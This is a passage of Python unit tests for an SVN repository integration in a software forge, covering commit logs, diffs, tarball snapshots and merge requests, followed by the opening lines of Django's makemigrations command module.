tg.config['scm.svn.hotcopy'] and
stdout != 'version 1.6')
result = func(obj, source_url)
assert result == expected
@mock.patch('forgesvn.model.svn.g.post_event')
def test_clone(self, post_event):
repo = SM.Repository(
name='testsvn',
fs_path=g.tmpdir + '/',
url_path='/test/',
tool='svn',
status='creating')
repo_path = pkg_resources.resource_filename(
'forgesvn', 'tests/data/testsvn')
dirname = os.path.join(repo.fs_path, repo.name)
if os.path.exists(dirname):
shutil.rmtree(dirname)
repo.init()
repo._impl.clone_from('file://' + repo_path)
assert not os.path.exists(
os.path.join(g.tmpdir, 'testsvn/hooks/pre-revprop-change'))
assert os.path.exists(
os.path.join(g.tmpdir, 'testsvn/hooks/post-commit'))
assert os.access(
os.path.join(g.tmpdir, 'testsvn/hooks/post-commit'), os.X_OK)
with open(os.path.join(g.tmpdir, 'testsvn/hooks/post-commit')) as f:
c = f.read()
self.assertIn(
'curl -s http://localhost/auth/refresh_repo/p/test/src/\n', c)
self.assertIn('exec $DIR/post-commit-user "$@"\n', c)
repo.refresh(notify=False)
assert len(list(repo.log()))
shutil.rmtree(dirname)
def test_index(self):
i = self.repo.index()
assert i['type_s'] == 'SVN Repository', i
def test_log_id_only(self):
entries = list(self.repo.log(id_only=True))
assert_equal(entries, [6, 5, 4, 3, 2, 1])
def test_log(self):
entries = list(self.repo.log(id_only=False))
assert_equal(entries, [
{'parents': [5],
'refs': ['HEAD'],
'committed': {
'date': datetime(2013, 11, 8, 13, 38, 11, 152821),
'name': u'coldmind', 'email': ''},
'message': u'',
'rename_details': {},
'id': 6,
'authored': {
'date': datetime(2013, 11, 8, 13, 38, 11, 152821),
'name': u'coldmind',
'email': ''
}, 'size': 0},
{'parents': [4],
'refs': [],
'committed': {
'date': datetime(2010, 11, 18, 20, 14, 21, 515743),
'name': u'rick446',
'email': ''},
'message': u'Copied a => b',
'rename_details': {},
'id': 5,
'authored': {
'date': datetime(2010, 11, 18, 20, 14, 21, 515743),
'name': u'rick446',
'email': ''},
'size': 0},
{'parents': [3],
'refs': [],
'committed': {
'date': datetime(2010, 10, 8, 15, 32, 59, 383719),
'name': u'rick446',
'email': ''},
'message': u'Remove hello.txt',
'rename_details': {},
'id': 4,
'authored': {
'date': datetime(2010, 10, 8, 15, 32, 59, 383719),
'name': u'rick446',
'email': ''},
'size': 0},
{'parents': [2],
'refs': [],
'committed': {
'date': datetime(2010, 10, 8, 15, 32, 48, 272296),
'name': u'rick446',
'email': ''},
'message': u'Modify readme',
'rename_details': {},
'id': 3,
'authored':
{'date': datetime(2010, 10, 8, 15, 32, 48, 272296),
'name': u'rick446',
'email': ''},
'size': 0},
{'parents': [1],
'refs': [],
'committed': {
'date': datetime(2010, 10, 8, 15, 32, 36, 221863),
'name': u'rick446',
'email': ''},
'message': u'Add path',
'rename_details': {},
'id': 2,
'authored': {
'date': datetime(2010, 10, 8, 15, 32, 36, 221863),
'name': u'rick446',
'email': ''},
'size': 0},
{'parents': [],
'refs': [],
'committed': {
'date': datetime(2010, 10, 8, 15, 32, 7, 238375),
'name': u'rick446',
'email': ''},
'message': u'Create readme',
'rename_details': {},
'id': 1,
'authored': {
'date': datetime(2010, 10, 8, 15, 32, 7, 238375),
'name': u'rick446',
'email': ''},
'size': 0}])
def test_log_file(self):
entries = list(self.repo.log(path='/README', id_only=False))
assert_equal(entries, [
{'authored': {'date': datetime(2010, 10, 8, 15, 32, 48, 272296),
'email': '',
'name': u'rick446'},
'committed': {'date': datetime(2010, 10, 8, 15, 32, 48, 272296),
'email': '',
'name': u'rick446'},
'id': 3,
'message': u'Modify readme',
'parents': [2],
'refs': [],
'size': 28,
'rename_details': {}},
{'authored': {'date': datetime(2010, 10, 8, 15, 32, 7, 238375),
'email': '',
'name': u'rick446'},
'committed': {'date': datetime(2010, 10, 8, 15, 32, 7, 238375),
'email': '',
'name': u'rick446'},
'id': 1,
'message': u'Create readme',
'parents': [],
'refs': [],
'size': 15,
'rename_details': {}},
])
def test_is_file(self):
assert self.repo.is_file('/README')
assert not self.repo.is_file('/a')
def test_paged_diffs(self):
entry = self.repo.commit(self.repo.log(2, id_only=True).next())
self.assertEqual(entry.diffs, entry.paged_diffs())
self.assertEqual(entry.diffs, entry.paged_diffs(start=0))
added_expected = entry.diffs.added[1:3]
expected = dict(
copied=[], changed=[], removed=[],
added=added_expected, total=4)
actual = entry.paged_diffs(start=1, end=3)
self.assertEqual(expected, actual)
empty = M.repo.Commit().paged_diffs()
self.assertEqual(sorted(actual.keys()), sorted(empty.keys()))
def test_diff_create_file(self):
entry = self.repo.commit(self.repo.log(1, id_only=True).next())
self.assertEqual(
entry.diffs, dict(
copied=[], changed=[],
removed=[], added=['/README'], total=1))
def test_diff_create_path(self):
entry = self.repo.commit(self.repo.log(2, id_only=True).next())
actual = entry.diffs
actual.added = sorted(actual.added)
self.assertEqual(
entry.diffs, dict(
copied=[], changed=[], removed=[],
added=sorted([
'/a', '/a/b', '/a/b/c',
'/a/b/c/hello.txt']), total=4))
def test_diff_modify_file(self):
entry = self.repo.commit(self.repo.log(3, id_only=True).next())
self.assertEqual(
entry.diffs, dict(
copied=[], changed=['/README'],
removed=[], added=[], total=1))
def test_diff_delete(self):
entry = self.repo.commit(self.repo.log(4, id_only=True).next())
self.assertEqual(
entry.diffs, dict(
copied=[], changed=[],
removed=['/a/b/c/hello.txt'], added=[], total=1))
def test_diff_copy(self):
# Copies are currently only detected as 'add'
entry = self.repo.commit(self.repo.log(5, id_only=True).next())
self.assertEqual(
entry.diffs, dict(
copied=[], changed=[],
removed=[], added=['/b'], total=1))
def test_commit(self):
entry = self.repo.commit(1)
assert entry.committed.name == 'rick446'
assert entry.message
def test_svn_path_exists(self):
repo_path = pkg_resources.resource_filename(
'forgesvn', 'tests/data/testsvn')
assert svn_path_exists("file://%s/a" % repo_path)
assert svn_path_exists("file://%s" % repo_path)
assert not svn_path_exists("file://%s/badpath" % repo_path)
with mock.patch('forgesvn.model.svn.pysvn') as pysvn:
svn_path_exists('dummy')
pysvn.Client.return_value.info2.assert_called_once_with(
'dummy',
revision=pysvn.Revision.return_value,
recurse=False)
@onlyif(os.path.exists(tg.config.get('scm.repos.tarball.zip_binary', '/usr/bin/zip')), 'zip binary is missing')
def test_tarball(self):
tmpdir = tg.config['scm.repos.tarball.root']
assert_equal(self.repo.tarball_path,
os.path.join(tmpdir, 'svn/t/te/test/testsvn'))
assert_equal(self.repo.tarball_url('1'),
'file:///svn/t/te/test/testsvn/test-src-1.zip')
self.repo.tarball('1')
assert os.path.isfile(
os.path.join(tmpdir, "svn/t/te/test/testsvn/test-src-1.zip"))
tarball_zip = ZipFile(
os.path.join(tmpdir, 'svn/t/te/test/testsvn/test-src-1.zip'), 'r')
assert_equal(tarball_zip.namelist(),
['test-src-1/', 'test-src-1/README'])
shutil.rmtree(self.repo.tarball_path.encode('utf-8'),
ignore_errors=True)
@onlyif(os.path.exists(tg.config.get('scm.repos.tarball.zip_binary', '/usr/bin/zip')), 'zip binary is missing')
def test_tarball_aware_of_tags(self):
rev = '19'
tag_content = sorted(['test-svn-tags-19-tags-tag-1.0/',
'test-svn-tags-19-tags-tag-1.0/svn-commit.tmp',
'test-svn-tags-19-tags-tag-1.0/README'])
h.set_context('test', 'svn-tags', neighborhood='Projects')
tmpdir = tg.config['scm.repos.tarball.root']
tarball_path = os.path.join(
tmpdir, 'svn/t/te/test/testsvn-trunk-tags-branches/')
fn = tarball_path + 'test-svn-tags-19-tags-tag-1.0.zip'
self.svn_tags.tarball(rev, '/tags/tag-1.0/')
assert os.path.isfile(fn), fn
snapshot = ZipFile(fn, 'r')
assert_equal(sorted(snapshot.namelist()), tag_content)
os.remove(fn)
self.svn_tags.tarball(rev, '/tags/tag-1.0/some/path/')
assert os.path.isfile(fn), fn
snapshot = ZipFile(fn, 'r')
assert_equal(sorted(snapshot.namelist()), tag_content)
os.remove(fn)
# if inside of tags, but no tag is specified
# expect snapshot of trunk
fn = tarball_path + 'test-svn-tags-19-trunk.zip'
self.svn_tags.tarball(rev, '/tags/')
assert os.path.isfile(fn), fn
snapshot = ZipFile(fn, 'r')
assert_equal(sorted(snapshot.namelist()),
sorted(['test-svn-tags-19-trunk/',
'test-svn-tags-19-trunk/aaa.txt',
'test-svn-tags-19-trunk/bbb.txt',
'test-svn-tags-19-trunk/ccc.txt',
'test-svn-tags-19-trunk/README']))
shutil.rmtree(tarball_path, ignore_errors=True)
@onlyif(os.path.exists(tg.config.get('scm.repos.tarball.zip_binary', '/usr/bin/zip')), 'zip binary is missing')
def test_tarball_aware_of_branches(self):
rev = '19'
branch_content = sorted(['test-svn-tags-19-branches-aaa/',
'test-svn-tags-19-branches-aaa/aaa.txt',
'test-svn-tags-19-branches-aaa/svn-commit.tmp',
'test-svn-tags-19-branches-aaa/README'])
h.set_context('test', 'svn-tags', neighborhood='Projects')
tmpdir = tg.config['scm.repos.tarball.root']
tarball_path = os.path.join(
tmpdir, 'svn/t/te/test/testsvn-trunk-tags-branches/')
fn = tarball_path + 'test-svn-tags-19-branches-aaa.zip'
self.svn_tags.tarball(rev, '/branches/aaa/')
assert os.path.isfile(fn), fn
snapshot = ZipFile(fn, 'r')
assert_equal(sorted(snapshot.namelist()), branch_content)
os.remove(fn)
self.svn_tags.tarball(rev, '/branches/aaa/some/path/')
assert os.path.isfile(fn), fn
snapshot = ZipFile(fn, 'r')
assert_equal(sorted(snapshot.namelist()), branch_content)
os.remove(fn)
# if inside of branches, but no branch is specified
# expect snapshot of trunk
fn = tarball_path + 'test-svn-tags-19-trunk.zip'
self.svn_tags.tarball(rev, '/branches/')
assert os.path.isfile(fn), fn
snapshot = ZipFile(fn, 'r')
assert_equal(sorted(snapshot.namelist()),
sorted(['test-svn-tags-19-trunk/',
'test-svn-tags-19-trunk/aaa.txt',
'test-svn-tags-19-trunk/bbb.txt',
'test-svn-tags-19-trunk/ccc.txt',
'test-svn-tags-19-trunk/README']))
shutil.rmtree(tarball_path, ignore_errors=True)
@onlyif(os.path.exists(tg.config.get('scm.repos.tarball.zip_binary', '/usr/bin/zip')), 'zip binary is missing')
def test_tarball_aware_of_trunk(self):
rev = '19'
trunk_content = sorted(['test-svn-tags-19-trunk/',
'test-svn-tags-19-trunk/aaa.txt',
'test-svn-tags-19-trunk/bbb.txt',
'test-svn-tags-19-trunk/ccc.txt',
'test-svn-tags-19-trunk/README'])
h.set_context('test', 'svn-tags', neighborhood='Projects')
tmpdir = tg.config['scm.repos.tarball.root']
tarball_path = os.path.join(
tmpdir, 'svn/t/te/test/testsvn-trunk-tags-branches/')
fn = tarball_path + 'test-svn-tags-19-trunk.zip'
self.svn_tags.tarball(rev, '/trunk/')
assert os.path.isfile(fn), fn
snapshot = ZipFile(fn, 'r')
assert_equal(sorted(snapshot.namelist()), trunk_content)
os.remove(fn)
self.svn_tags.tarball(rev, '/trunk/some/path/')
assert os.path.isfile(fn), fn
snapshot = ZipFile(fn, 'r')
assert_equal(sorted(snapshot.namelist()), trunk_content)
os.remove(fn)
# no path, but there are trunk in the repo
# expect snapshot of trunk
self.svn_tags.tarball(rev)
assert os.path.isfile(fn), fn
snapshot = ZipFile(fn, 'r')
assert_equal(sorted(snapshot.namelist()), trunk_content)
os.remove(fn)
# no path, and no trunk dir
# expect snapshot of repo root
h.set_context('test', 'src', neighborhood='Projects')
fn = os.path.join(tmpdir, 'svn/t/te/test/testsvn/test-src-1.zip')
self.repo.tarball('1')
assert os.path.isfile(fn), fn
snapshot = ZipFile(fn, 'r')
assert_equal(snapshot.namelist(), ['test-src-1/', 'test-src-1/README'])
shutil.rmtree(os.path.join(tmpdir, 'svn/t/te/test/testsvn/'),
ignore_errors=True)
shutil.rmtree(tarball_path, ignore_errors=True)
def test_is_empty(self):
assert not self.repo.is_empty()
with TempDirectory() as d:
repo2 = SM.Repository(
name='test',
fs_path=d.path,
url_path='/test/',
tool='svn',
status='creating')
repo2.init()
assert repo2.is_empty()
repo2.refresh()
ThreadLocalORMSession.flush_all()
assert repo2.is_empty()
class TestSVNRev(unittest.TestCase):
def setUp(self):
setup_basic_test()
self.setup_with_tools()
@with_svn
def setup_with_tools(self):
setup_global_objects()
h.set_context('test', 'src', neighborhood='Projects')
repo_dir = pkg_resources.resource_filename(
'forgesvn', 'tests/data/')
self.repo = SM.Repository(
name='testsvn',
fs_path=repo_dir,
url_path='/test/',
tool='svn',
status='creating')
self.repo.refresh()
self.rev = self.repo.commit(1)
ThreadLocalORMSession.flush_all()
ThreadLocalORMSession.close_all()
def test_url(self):
assert self.rev.url().endswith('/1/')
def test_primary(self):
assert self.rev.primary() == self.rev
def test_shorthand(self):
assert self.rev.shorthand_id() == '[r1]'
def test_diff(self):
diffs = (self.rev.diffs.added
+ self.rev.diffs.removed
+ self.rev.diffs.changed
+ self.rev.diffs.copied)
for d in diffs:
print d
def _oid(self, rev_id):
return '%s:%s' % (self.repo._id, rev_id)
def test_log(self):
# path only
commits = list(self.repo.log(self.repo.head, id_only=True))
assert_equal(commits, [6, 5, 4, 3, 2, 1])
commits = list(self.repo.log(self.repo.head, 'README', id_only=True))
assert_equal(commits, [3, 1])
commits = list(self.repo.log(1, 'README', id_only=True))
assert_equal(commits, [1])
commits = list(self.repo.log(self.repo.head, 'a/b/c/', id_only=True))
assert_equal(commits, [4, 2])
commits = list(self.repo.log(3, 'a/b/c/', id_only=True))
assert_equal(commits, [2])
assert_equal(
list(self.repo.log(self.repo.head, 'does/not/exist', id_only=True)), [])
def test_notification_email(self):
setup_global_objects()
h.set_context('test', 'src', neighborhood='Projects')
repo_dir = pkg_resources.resource_filename(
'forgesvn', 'tests/data/')
self.repo = SM.Repository(
name='testsvn',
fs_path=repo_dir,
url_path='/test/',
tool='svn',
status='creating')
self.repo.refresh()
ThreadLocalORMSession.flush_all()
send_notifications(self.repo, [self.repo.rev_to_commit_id(1)])
ThreadLocalORMSession.flush_all()
n = M.Notification.query.find(
dict(subject='[test:src] [r1] - rick446: Create readme')).first()
assert n
assert_equal(n.text, 'Create readme http://localhost/p/test/src/1/')
class _Test(unittest.TestCase):
idgen = ('obj_%d' % i for i in count())
def _make_tree(self, object_id, **kwargs):
t, isnew = M.repo.Tree.upsert(object_id)
repo = getattr(self, 'repo', None)
t.repo = repo
for k, v in kwargs.iteritems():
if isinstance(v, basestring):
obj = M.repo.Blob(
t, k, self.idgen.next())
t.blob_ids.append(Object(
name=k, id=obj._id))
else:
obj = self._make_tree(self.idgen.next(), **v)
t.tree_ids.append(Object(
name=k, id=obj._id))
session(t).flush()
return t
def _make_commit(self, object_id, **tree_parts):
ci, isnew = M.repo.Commit.upsert(object_id)
if isnew:
ci.committed.email = c.user.email_addresses[0]
ci.authored.email = c.user.email_addresses[0]
dt = datetime.utcnow()
# BSON datetime resolution is to 1 millisecond, not 1 microsecond
# like Python. Round this now so it'll match the value that's
# pulled from MongoDB in the tests.
ci.authored.date = dt.replace(
microsecond=dt.microsecond / 1000 * 1000)
ci.message = 'summary\n\nddescription'
ci.set_context(self.repo)
ci.tree_id = 't_' + object_id
ci.tree = self._make_tree(ci.tree_id, **tree_parts)
return ci, isnew
def _make_log(self, ci):
session(ci).flush(ci)
rb = M.repo_refresh.CommitRunBuilder([ci._id])
rb.run()
rb.cleanup()
def setUp(self):
setup_basic_test()
setup_global_objects()
ThreadLocalORMSession.flush_all()
ThreadLocalORMSession.close_all()
self.prefix = tg.config.get('scm.repos.root', '/')
class _TestWithRepo(_Test):
def setUp(self):
super(_TestWithRepo, self).setUp()
h.set_context('test', neighborhood='Projects')
c.project.install_app('svn', 'test1')
h.set_context('test', 'test1', neighborhood='Projects')
self.repo = M.Repository(name='test1', tool='svn')
self.repo._impl = mock.Mock(spec=M.RepositoryImplementation())
self.repo._impl.shorthand_for_commit = M.RepositoryImplementation.shorthand_for_commit
self.repo._impl.url_for_commit = (
lambda *a, **kw: M.RepositoryImplementation.url_for_commit(
self.repo._impl, *a, **kw))
self.repo._impl._repo = self.repo
self.repo._impl.all_commit_ids = lambda *a, **kw: []
self.repo._impl.commit().symbolic_ids = None
ThreadLocalORMSession.flush_all()
# ThreadLocalORMSession.close_all()
class _TestWithRepoAndCommit(_TestWithRepo):
def setUp(self):
super(_TestWithRepoAndCommit, self).setUp()
self.ci, isnew = self._make_commit('foo')
ThreadLocalORMSession.flush_all()
# ThreadLocalORMSession.close_all()
class TestRepo(_TestWithRepo):
def test_create(self):
assert self.repo.fs_path == os.path.join(self.prefix, 'svn/p/test/')
assert self.repo.url_path == '/p/test/'
assert self.repo.full_fs_path == os.path.join(
self.prefix, 'svn/p/test/test1')
def test_passthrough(self):
argless = ['init']
for fn in argless:
getattr(self.repo, fn)()
getattr(self.repo._impl, fn).assert_called_with()
unary = ['commit', 'open_blob']
for fn in unary:
getattr(self.repo, fn)('foo')
getattr(self.repo._impl, fn).assert_called_with('foo')
def test_shorthand_for_commit(self):
self.assertEqual(
self.repo.shorthand_for_commit('a' * 40),
'[aaaaaa]')
def test_url_for_commit(self):
self.assertEqual(
self.repo.url_for_commit('a' * 40),
'/p/test/test1/ci/aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/')
@mock.patch('allura.model.repository.g.post_event')
def test_init_as_clone(self, post_event):
self.repo.init_as_clone('srcpath', 'srcname', 'srcurl')
assert self.repo.upstream_repo.name == 'srcname'
assert self.repo.upstream_repo.url == 'srcurl'
assert self.repo._impl.clone_from.called_with('srcpath')
post_event.assert_called_once_with('repo_cloned', 'srcurl', 'srcpath')
def test_latest(self):
ci = mock.Mock()
self.repo._impl.commit = mock.Mock(return_value=ci)
assert self.repo.latest() is ci
def test_index(self):
i = self.repo.index()
assert i['type_s'] == 'Repository', i
assert i['name_s'] == 'test1', i
def test_scm_host_url(self):
assert (
self.repo.clone_url('rw', 'nobody')
== 'svn+ssh://nobody@localhost:8022/scm-repo/p/test/test1/'),\
self.repo.clone_url('rw', 'nobody')
assert (
self.repo.clone_url('https', 'nobody')
== 'https://nobody@localhost:8022/scm-repo/p/test/test1/'),\
self.repo.clone_url('https', 'nobody')
def test_merge_request(self):
M.MergeRequest.upsert(app_config_id=c.app.config._id, status='open')
M.MergeRequest.upsert(app_config_id=c.app.config._id, status='closed')
session(M.MergeRequest).flush()
session(M.MergeRequest).clear()
assert self.repo.merge_requests_by_statuses('open').count() == 1
assert self.repo.merge_requests_by_statuses('closed').count() == 1
assert self.repo.merge_requests_by_statuses(
'open', 'closed').count() == 2
def test_guess_type(self):
assert self.repo.guess_type('foo.txt') == ('text/plain', None)
assert self.repo.guess_type('foo.gbaer') == (
'application/octet-stream', None)
assert self.repo.guess_type('foo.html') == ('text/html', None)
assert self.repo.guess_type('.gitignore') == ('text/plain', None)
def test_refresh(self):
committer_name = 'Test Committer'
committer_email = '[email protected]'
ci = mock.Mock()
ci.authored.name = committer_name
ci.committed.name = committer_name
ci.committed.email = committer_email
ci.author_url = '/u/test-committer/'
ci.activity_name = '[deadbeef]'
ci.activity_url = 'url'
ci.activity_extras = {}
del ci.node_id
self.repo._impl.commit = mock.Mock(return_value=ci)
self.repo._impl.new_commits = mock.Mock(
return_value=['foo%d' % i for i in range(100)])
self.repo._impl.all_commit_ids = mock.Mock(
return_value=['foo%d' % i for i in range(100)])
self.repo.symbolics_for_commit = mock.Mock(
return_value=[['master', 'branch'], []])
def refresh_commit_info(oid, seen, lazy=False):
M.repo.CommitDoc(dict(
authored=dict(
name=committer_name,
email=committer_email),
_id=oid)).m.insert()
self.repo._impl.refresh_commit_info = refresh_commit_info
_id = lambda oid: getattr(oid, '_id', str(oid))
self.repo.shorthand_for_commit = lambda oid: '[' + _id(oid) + ']'
self.repo.url_for_commit = lambda oid: '/ci/' + _id(oid) + '/'
self.repo.refresh()
ThreadLocalORMSession.flush_all()
notifications = M.Notification.query.find().all()
for n in notifications:
if '100 new commits' in n.subject:
assert "master,branch: by %s http://localhost/ci/foo99" % committer_name in n.text
break
else:
assert False, 'Did not find notification'
assert M.Feed.query.find(dict(
author_name=committer_name)).count() == 100
def test_refresh_private(self):
ci = mock.Mock()
self.repo._impl.commit = mock.Mock(return_value=ci)
self.repo._impl.new_commits = mock.Mock(
return_value=['foo%d' % i for i in range(100)])
# make unreadable by *anonymous, so additional notification logic
# executes
self.repo.acl = []
c.project.acl = []
self.repo.refresh()
def test_push_upstream_context(self):
self.repo.init_as_clone('srcpath', '/p/test/svn/', '/p/test/svn/')
old_app_instance = M.Project.app_instance
try:
M.Project.app_instance = mock.Mock(return_value=ming.base.Object(
config=ming.base.Object(_id=None)))
with self.repo.push_upstream_context():
assert c.project.shortname == 'test'
finally:
M.Project.app_instance = old_app_instance
def test_pending_upstream_merges(self):
self.repo.init_as_clone('srcpath', '/p/test/svn/', '/p/test/svn/')
old_app_instance = M.Project.app_instance
try:
M.Project.app_instance = mock.Mock(return_value=ming.base.Object(
config=ming.base.Object(_id=None)))
self.repo.pending_upstream_merges()
finally:
M.Project.app_instance = old_app_instance
class TestMergeRequest(_TestWithRepoAndCommit):
def setUp(self):
super(TestMergeRequest, self).setUp()
c.project.install_app('svn', 'test2')
h.set_context('test', 'test2', neighborhood='Projects')
self.repo2 = M.Repository(name='test2', tool='svn')
self.repo2._impl = mock.Mock(spec=M.RepositoryImplementation())
self.repo2._impl.log = lambda *a, **kw: (['foo'], [])
self.repo2._impl.all_commit_ids = lambda *a, **kw: []
self.repo2._impl._repo = self.repo2
self.repo2.init_as_clone('/p/test/', 'test1', '/p/test/test1/')
ThreadLocalORMSession.flush_all()
ThreadLocalORMSession.close_all()
def test_upsert(self):
h.set_context('test', 'test1', neighborhood='Projects')
mr = M.MergeRequest.upsert(
downstream=ming.base.Object(
project_id=c.project._id,
mount_point='test2',
commit_id='foo:2'),
target_branch='foobranch',
summary='summary',
description='description')
u = M.User.by_username('test-admin')
assert_equal(mr.creator, u)
assert_equal(mr.creator_name, u.get_pref('display_name'))
assert_equal(mr.creator_url, u.url())
assert_equal(mr.downstream_url, '/p/test/test2/')
assert_equal(mr.downstream_repo_url,
'http://svn.localhost/p/test/test2/')
with mock.patch('forgesvn.model.svn.SVNLibWrapper') as _svn,\
mock.patch('forgesvn.model.svn.SVNImplementation._map_log') as _map_log:
mr.app.repo._impl.head = 1
_svn().log.return_value = [mock.Mock(revision=mock.Mock(number=2))]
_map_log.return_value = 'bar'
assert_equal(mr.commits, ['bar'])
# can't do assert_called_once_with because pysvn.Revision doesn't
# compare nicely
assert_equal(_svn().log.call_count, 1)
assert_equal(_svn().log.call_args[0],
('file:///tmp/svn/p/test/test2',))
assert_equal(_svn().log.call_args[1]['revision_start'].number, 2)
assert_equal(_svn().log.call_args[1]['limit'], 25)
_map_log.assert_called_once_with(
_svn().log.return_value[0], 'file:///tmp/svn/p/test/test2', None)
class TestRepoObject(_TestWithRepoAndCommit):
def test_upsert(self):
obj0, isnew0 = M.repo.Tree.upsert('foo1')
obj1, isnew1 = M.repo.Tree.upsert('foo1')
assert obj0 is obj1
assert isnew0 and not isnew1
def test_artifact_methods(self):
assert self.ci.index_id(
) == 'allura/model/repo/Commit#foo', self.ci.index_id()
assert self.ci.primary() is self.ci, self.ci.primary()
class TestCommit(_TestWithRepo):
def setUp(self):
super(TestCommit, self).setUp()
self.ci, isnew = self._make_commit(
'foo',
a=dict(
a=dict(
a='',
b='',),
b=''))
self.tree = self.ci.tree
impl = M.RepositoryImplementation()
impl._repo = self.repo
self.repo._impl.shorthand_for_commit = impl.shorthand_for_commit
self.repo._impl.url_for_commit = impl.url_for_commit
def test_upsert(self):
obj0, isnew0 = M.repo.Commit.upsert('foo')
obj1, isnew1 = M.repo.Commit.upsert('foo')
assert obj0 is obj1
assert not isnew1
u = M.User.by_username('test-admin')
assert self.ci.author_url == u.url()
assert self.ci.committer_url == u.url()
assert self.ci.tree is self.tree
assert self.ci.summary == 'summary'
assert self.ci.shorthand_id() == '[foo]'
assert self.ci.url() == '/p/test/test1/ci/foo/'
def test_get_path(self):
b = self.ci.get_path('a/a/a')
assert isinstance(b, M.repo.Blob)
x = self.ci.get_path('a/a')
assert isinstance(x, M.repo.Tree)
def _unique_blobs(self):
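        # Test helper: builds a fake open_blob callable in which every distinct
        # blob path gets its own small, stable piece of content, so the diff
        # computations below treat each file as unique.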
def counter():
counter.i += 1
return counter.i
counter.i = 0
blobs = defaultdict(counter)
from cStringIO import StringIO
return lambda blob: StringIO(str(blobs[blob.path()]))
def test_compute_diffs(self):
self.repo._impl.commit = mock.Mock(return_value=self.ci)
self.repo._impl.open_blob = self._unique_blobs()
M.repo_refresh.refresh_commit_trees(self.ci, {})
M.repo_refresh.compute_diffs(self.repo._id, {}, self.ci)
# self.ci.compute_diffs()
assert_equal(self.ci.diffs.added,
['a', 'a/a', 'a/a/a', 'a/a/b', 'a/b'])
assert (self.ci.diffs.copied
== self.ci.diffs.changed
== self.ci.diffs.removed
== [])
ci, isnew = self._make_commit('bar')
ci.parent_ids = ['foo']
self._make_log(ci)
M.repo_refresh.refresh_commit_trees(ci, {})
M.repo_refresh.compute_diffs(self.repo._id, {}, ci)
assert_equal(ci.diffs.removed, ['a', 'a/a', 'a/a/a', 'a/a/b', 'a/b'])
assert (ci.diffs.copied
== ci.diffs.changed
== ci.diffs.added
== [])
ci, isnew = self._make_commit(
'baz',
b=dict(
a=dict(
a='',
b='',),
b=''))
ci.parent_ids = ['foo']
self._make_log(ci)
M.repo_refresh.refresh_commit_trees(ci, {})
M.repo_refresh.compute_diffs(self.repo._id, {}, ci)
assert_equal(ci.diffs.added, ['b', 'b/a', 'b/a/a', 'b/a/b', 'b/b'])
assert_equal(ci.diffs.removed, ['a', 'a/a', 'a/a/a', 'a/a/b', 'a/b'])
assert (ci.diffs.copied
== ci.diffs.changed
== [])
def test_diffs_file_renames(self):
def open_blob(blob):
blobs = {
u'a': u'Leia',
u'/b/a/a': u'Darth Vader',
u'/b/a/b': u'Luke Skywalker',
u'/b/b': u'Death Star will destroy you',
u'/b/c': u'Luke Skywalker', # moved from /b/a/b
# moved from /b/b and modified
u'/b/a/z': u'Death Star will destroy you\nALL',
}
from cStringIO import StringIO
return StringIO(blobs.get(blob.path(), ''))
self.repo._impl.open_blob = open_blob
self.repo._impl.commit = mock.Mock(return_value=self.ci)
M.repo_refresh.refresh_commit_trees(self.ci, {})
M.repo_refresh.compute_diffs(self.repo._id, {}, self.ci)
assert_equal(self.ci.diffs.added,
['a', 'a/a', 'a/a/a', 'a/a/b', 'a/b'])
assert (self.ci.diffs.copied
== self.ci.diffs.changed
== self.ci.diffs.removed
== [])
ci, isnew = self._make_commit(
'bar',
b=dict(
a=dict(
a='',
b='',),
b=''))
ci.parent_ids = ['foo']
self._make_log(ci)
M.repo_refresh.refresh_commit_trees(ci, {})
M.repo_refresh.compute_diffs(self.repo._id, {}, ci)
assert_equal(ci.diffs.added, ['b', 'b/a', 'b/a/a', 'b/a/b', 'b/b'])
assert_equal(ci.diffs.removed, ['a', 'a/a', 'a/a/a', 'a/a/b', 'a/b'])
assert (ci.diffs.copied
== ci.diffs.changed
== [])
ci, isnew = self._make_commit(
'baz',
b=dict(
a=dict(
z=''),
c=''))
ci.parent_ids = ['bar']
self._make_log(ci)
M.repo_refresh.refresh_commit_trees(ci, {})
M.repo_refresh.compute_diffs(self.repo._id, {}, ci)
assert_equal(ci.diffs.added, [])
assert_equal(ci.diffs.changed, [])
assert_equal(ci.diffs.removed, ['b/a/a'])
# see mock for open_blob
assert_equal(len(ci.diffs.copied), 2)
assert_equal(ci.diffs.copied[0]['old'], 'b/a/b')
assert_equal(ci.diffs.copied[0]['new'], 'b/c')
assert_equal(ci.diffs.copied[0]['ratio'], 1)
assert_equal(ci.diffs.copied[0]['diff'], '')
assert_equal(ci.diffs.copied[1]['old'], 'b/b')
assert_equal(ci.diffs.copied[1]['new'], 'b/a/z')
assert ci.diffs.copied[1]['ratio'] < 1, ci.diffs.copied[1]['ratio']
assert '+++' in ci.diffs.copied[1]['diff'], ci.diffs.copied[1]['diff']
def test_context(self):
self.ci.context()
class TestRename(unittest.TestCase):
def setUp(self):
setup_basic_test()
self.setup_with_tools()
@with_svn
def setup_with_tools(self):
setup_global_objects()
h.set_context('test', 'src', neighborhood='Projects')
repo_dir = pkg_resources.resource_filename(
'forgesvn', 'tests/data/')
self.repo = SM.Repository(
name='testsvn-rename',
fs_path=repo_dir,
url_path='/test/',
tool='svn',
status='creating')
self.repo.refresh()
self.rev = self.repo.commit('HEAD')
ThreadLocalORMSession.flush_all()
ThreadLocalORMSession.close_all()
def test_log_file_with_rename(self):
entry = list(self.repo.log(path='/dir/b.txt', id_only=False))[0]
assert_equal(entry['id'], 3)
assert_equal(entry['rename_details']['path'], '/dir/a.txt')
assert_equal(
entry['rename_details']['commit_url'],
self.repo.url_for_commit(2) # previous revision
)
def test_check_changed_path(self):
changed_path = {'copyfrom_path': '/test/path', 'path': '/test/path2'}
result = self.repo._impl._check_changed_path(
changed_path, '/test/path2/file.txt')
assert_equal({'path': '/test/path2/file.txt',
'copyfrom_path': '/test/path/file.txt'}, result)
| apache-2.0 |
benjaminjkraft/django | django/core/management/commands/makemigrations.py | 10 | 13506 | import os
import sys
import warnings
from itertools import takewhile
from django.apps import apps
from django.core.management.base import BaseCommand, CommandError
from django.db.migrations import Migration
from django.db.migrations.autodetector import MigrationAutodetector
from django.db.migrations.loader import MigrationLoader
from django.db.migrations.questioner import (
InteractiveMigrationQuestioner, MigrationQuestioner,
NonInteractiveMigrationQuestioner,
)
from django.db.migrations.state import ProjectState
from django.db.migrations.writer import MigrationWriter
from django.utils.deprecation import RemovedInDjango20Warning
from django.utils.six import iteritems
from django.utils.six.moves import zip
class Command(BaseCommand):
help = "Creates new migration(s) for apps."
def add_arguments(self, parser):
